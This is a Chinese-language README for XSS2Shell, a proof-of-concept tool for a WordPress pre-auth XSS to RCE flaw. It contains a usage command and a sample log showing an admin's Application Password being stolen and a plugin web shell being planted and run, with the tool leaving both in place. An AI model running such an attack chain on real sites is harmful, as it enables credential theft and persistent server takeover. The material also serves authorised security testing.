XSS2Shell 是针对 CVE-2026-64638 的教育性概念验证(PoC),演示了易受攻击的 WordPress 安装中预认证 XSS 问题的影响。在管理员明确参与的情况下,该 PoC 会捕获 WordPress 应用程序密码、发布临时页面、上传测试插件,并检查最终生成的 shell 端点能否执行命令。
技术背景:WordPress 预认证 XSS 到 RCE:CVE-2026-64638
仅限教育和授权测试。 请仅针对您拥有或已获得书面授权评估的 WordPress 站点运行此工具。请勿使用它来攻击第三方管理员或生产系统。
python3 xss2shell_poc.py -t http://wordpress.research.local --lhost 192.168.1.227 --lport 8080 -c "whoami"
| 选项 | 必填 | 描述 |
|---|---|---|
-t, --target | 是 | WordPress 基础 URL,包含 http:// 或 https:// |
-c, --command | 是 | shell 可用后要执行的命令 |
--lhost | 否 | 要绑定并通告的监听 IP;默认为检测到的局域网 IP |
--lport | 否 | 监听端口;0 表示随机选择可用端口 |
--keep | 否 | 保留已发布的内容,而不是删除临时页面 |
目标 URL 会自动规范化,因此末尾的斜杠并非必需。
/wp-login.php 是否可访问,并确认其看起来像 WordPress 登录页面。shell.php 并运行所请求的命令。监听器必须能够被管理员的浏览器访问。NAT、防火墙、代理、弹窗拦截和混合内容规则都可能阻止浏览器流程完成。
__ __ _ _____
\ \ / / | |/ ____|
\ \ /\ / /__ _ __ __| | (___ ___ ___
\ \/ \/ / _ \| '__/ _` |\___ \ / _ \/ __|
\ /\ / (_) | | | (_| |____) | __/ (__
\/ \/ \___/|_| \__,_|_____/ \___|\___|
xss2shell & CVE-2026-64638 | https://wordsec.net/ - Education Purpose Only
============================================================
[*] XSS2Shell starting ...
[*] Checking target: http://wordpress.research.local/wp-login.php
[+] Admin panel found: http://wordpress.research.local/wp-login.php
[+] Attacker server listening: 192.168.1.227:8080
[*] On the target website, the admin must open this page and log in:
-> http://wordpress.research.local/wp-login.php
[*] Then the admin opens the link that was sent to them:
-> http://192.168.1.227:8080/
[*] Waiting for the admin to visit (Ctrl+C to stop) ...
[+] Child popup document initialized
[+] Popup window ready, XSS payload prepared
[+] Application Password saved to xss2shell_creds.json for later runs (shell: http://wordpress.research.local/wp-content/plugins/xss2shell/shell.php)
[+] XSS payload POSTed to wp-login.php
[+] Application Password stolen: user=admin pass=3SGS Loba 2Txw EzWz EbZC xZst (saved to xss2shell_creds.json)
[+] Attacker page published: http://wordpress.research.local/xss2shell-1786125273210/
[+] Plugin ZIP upload request sent with the victim's session
[+] Shell reachable: http://wordpress.research.local/wp-content/plugins/xss2shell/shell.php
============================================================
[+] Command output:
www-data
============================================================
[*] Cleanup: published page deleted (id=61)
[*] Cleanup: Application Password, plugin shell, and saved credentials preserved
[+] Shell link: http://wordpress.research.local/wp-content/plugins/xss2shell/shell.php?cmd=whoami
[+] Done.
成功运行会将捕获的应用程序密码保存到 xss2shell_creds.json,以便在后续运行中复用。除非使用 --keep,否则临时发布的页面会在命令执行后自动删除。
当前 PoC 有意保留测试插件、shell 端点、应用程序密码和已保存的凭据。完成授权评估后,请手动从测试站点中移除它们,并在本地删除 xss2shell_creds.json。
请将凭据文件视为敏感信息,切勿将其提交到版本控制中。
使用本仓库中包含的许可证。
由 WordSec 制作